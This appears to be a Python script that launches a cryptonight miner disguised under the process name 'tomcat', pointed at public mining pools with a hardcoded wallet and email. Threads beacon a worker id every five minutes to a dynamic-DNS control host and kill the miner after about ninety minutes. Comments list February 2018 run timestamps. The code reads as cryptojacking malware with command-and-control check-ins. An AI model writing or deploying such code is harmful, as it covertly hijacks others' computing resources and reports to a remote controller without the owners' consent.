import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:57:01.569258
#2018-02-17 16:45:08.912444
#2018-02-17 18:32:04.054398
#2018-02-17 20:20:03.712170
#2018-02-17 22:06:05.619523
#2018-02-17 23:50:01.348524
#2018-02-18 01:39:06.327271
#2018-02-18 03:26:06.776088
#2018-02-18 05:15:05.771393
#2018-02-18 07:07:04.687153
#2018-02-18 08:55:04.118914
#2018-02-18 10:42:06.797071
#2018-02-18 12:27:05.985707
#2018-02-18 14:15:04.830662
#2018-02-18 16:06:01.957481
#2018-02-18 17:54:04.197515
#2018-02-18 19:42:07.632738
#2018-02-18 21:27:05.903191
#2018-02-18 23:16:07.173251
#2018-02-19 01:02:07.291433
#2018-02-19 02:49:05.171650
#2018-02-19 04:36:06.511040
#2018-02-19 06:21:04.827911
#2018-02-19 08:09:06.393932
#2018-02-19 09:59:06.923230
#2018-02-19 11:49:03.810973
#2018-02-19 13:34:07.183769
#2018-02-19 15:23:07.182158
#2018-02-19 17:11:01.808469
#2018-02-19 18:57:05.293748
#2018-02-19 20:44:05.561845
#2018-02-19 22:32:04.947042
#2018-02-20 00:17:07.566886
#2018-02-20 02:05:03.790437
#2018-02-20 03:56:03.719609
#2018-02-20 05:39:06.183865
#2018-02-20 07:24:05.820854
#2018-02-20 09:09:05.331837
#2018-02-20 10:52:03.821592
#2018-02-20 12:39:01.828882
#2018-02-20 14:24:06.284343
#2018-02-20 16:08:10.444239
#2018-02-20 17:54:06.469083
#2018-02-20 19:46:05.591045
#2018-02-20 21:37:04.632151
#2018-02-20 23:20:07.966374
#2018-02-21 01:06:01.880206
#2018-02-21 02:52:04.518351
#2018-02-21 04:39:01.727787
#2018-02-21 06:27:06.236522
#2018-02-21 08:12:01.911589
#2018-02-21 09:58:01.990160
#2018-02-21 11:45:10.382927
#2018-02-21 13:34:05.227199
#2018-02-21 15:19:07.067872
#2018-02-21 17:10:08.101978
#2018-02-21 18:59:08.198018
#2018-02-21 20:49:08.438018
#2018-02-21 22:33:06.636630
#2018-02-22 00:23:06.637479
#2018-02-22 02:11:04.810263
#2018-02-22 03:57:04.708937
#2018-02-22 05:44:01.664079
#2018-02-22 07:29:02.004623
#2018-02-22 09:17:08.296135
#2018-02-22 11:04:06.372999
#2018-02-22 12:52:07.573886
#2018-02-22 14:41:04.312107
#2018-02-22 16:26:01.534557
#2018-02-22 18:13:09.651881
#2018-02-22 20:02:01.544700
#2018-02-22 21:50:01.391322
#2018-02-22 23:37:04.986172
#2018-02-23 01:24:06.567750
#2018-02-23 03:09:07.163768
#2018-02-23 04:57:01.946953
#2018-02-23 06:43:06.138861
#2018-02-23 08:33:07.247421
#2018-02-23 10:48:09.088918
#2018-02-23 12:44:07.594148
#2018-02-23 14:29:06.686757
#2018-02-23 16:20:05.100364
#2018-02-23 18:08:06.926186
#2018-02-23 19:53:04.777276
#2018-02-23 21:36:08.726201
#2018-02-23 23:24:01.792936
#2018-02-24 01:17:01.631639
#2018-02-24 03:07:04.095810
#2018-02-24 04:53:01.268837
#2018-02-24 06:36:06.541000
#2018-02-24 08:26:03.862347
#2018-02-24 10:11:07.079075
#2018-02-24 12:06:05.606328
#2018-02-24 13:53:03.874070
#2018-02-24 15:32:05.646908
#2018-02-24 17:24:07.485936
#2018-02-24 19:12:07.284358
#2018-02-24 21:00:09.101464
#2018-02-24 23:32:03.500652
#2018-02-25 02:54:07.923425
#2018-02-25 06:35:01.656390